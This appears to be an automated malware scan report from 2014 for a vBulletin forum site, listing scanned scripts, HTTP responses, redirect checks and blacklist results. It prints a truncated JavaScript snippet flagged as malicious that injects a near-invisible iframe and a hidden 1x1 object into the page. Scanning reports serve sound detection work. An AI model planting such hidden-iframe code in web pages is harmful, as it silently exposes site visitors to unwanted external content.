Scanned pages/files
Request | Server response | Status |
http://s-ajfan.com/ | HTTP/1.1 200 OK Connection: close Date: Mon, 08 Sep 2014 19:53:25 GMT Accept-Ranges: bytes Server: nginx admin Content-Length: 67 Content-Type: text/html Last-Modified: Sat, 28 Dec 2013 19:29:10 GMT X-Cache: HIT from Backend | clean |
http://s-ajfan.com/vb/ | 200 OK Content-Length: 205791 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
<!-- var interstitialBox={ ie7: window.XMLHttpRequest && document.all && !window.opera, ie7offline: this.ie7 && window.location.href.indexOf("http")==-1, launch:false, scrollbarwidth: 16, loadpage:function(url){ page_request = url document.getElementById("interContent").innerHTML='<iframe src="'+ page_request +'" style="width: 10%; height: 1px" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hs } var pppid='pppid142'; document.write("<object style='display:block;width:1px;height:1px;position:absolute;left:0px;top:0px' id='"+pppid+"'></object>"); if (usingObject) {setupObject();} if (usingEditor) {startObject();} loadingPop(); self.focus(); -->
Antivirus reports:
http://s-ajfan.com/vb/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=387 | 200 OK Content-Length: 36628 Content-Type: application/javascript | clean |
http://s-ajfan.com/clientscript/yui/connection/connection-min.js?v=387 | 404 Not Found Content-Length: 362 Content-Type: text/html | clean |
http://s-ajfan.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://s-ajfan.com/clientscript/vbulletin_global.js?v=387 | 404 Not Found Content-Length: 349 Content-Type: text/html | clean |
http://s-ajfan.com/clientscript/vbulletin_menu.js?v=387 | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://www.s-ajfan.com/vb/clientscript/ncode_imageresizer.js?v=1.0.2 | 200 OK Content-Length: 9465 Content-Type: application/javascript | clean |
http://www.s-ajfan.com/vb/clientscript/slimbox/slimbox.js | 200 OK Content-Length: 4300 Content-Type: application/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12388 Content-Type: application/javascript | clean |
http://s-ajfan.com/massy/poem.js | 404 Not Found Content-Length: 330 Content-Type: text/html | clean |
http://s-ajfan.com/massy/gradient.js | 404 Not Found Content-Length: 334 Content-Type: text/html | clean |
http://s-ajfan.com/aerowindow/js/jquery-1.4.2.min.js | 404 Not Found Content-Length: 350 Content-Type: text/html | clean |
http://s-ajfan.com/aerowindow/js/jquery-ui-1.8.1.custom.min.js | 404 Not Found Content-Length: 360 Content-Type: text/html | clean |
http://s-ajfan.com/aerowindow/js/jquery.easing.1.3.js | 404 Not Found Content-Length: 351 Content-Type: text/html | clean |
http://s-ajfan.com/aerowindow/js/jquery-AeroWindow.js | 404 Not Found Content-Length: 351 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: s-ajfan.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 08 Sep 2014 19:53:25 GMT
Accept-Ranges: bytes
Server: nginx admin
Content-Length: 67
Content-Type: text/html
Last-Modified: Sat, 28 Dec 2013 19:29:10 GMT
X-Cache: HIT from Backend
...67 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: s-ajfan.com
Referer: http://www.google.com/search?q=s-ajfan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=s-ajfan.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://s-ajfan.com/
Result: s-ajfan.com is not infected or malware details are not published yet.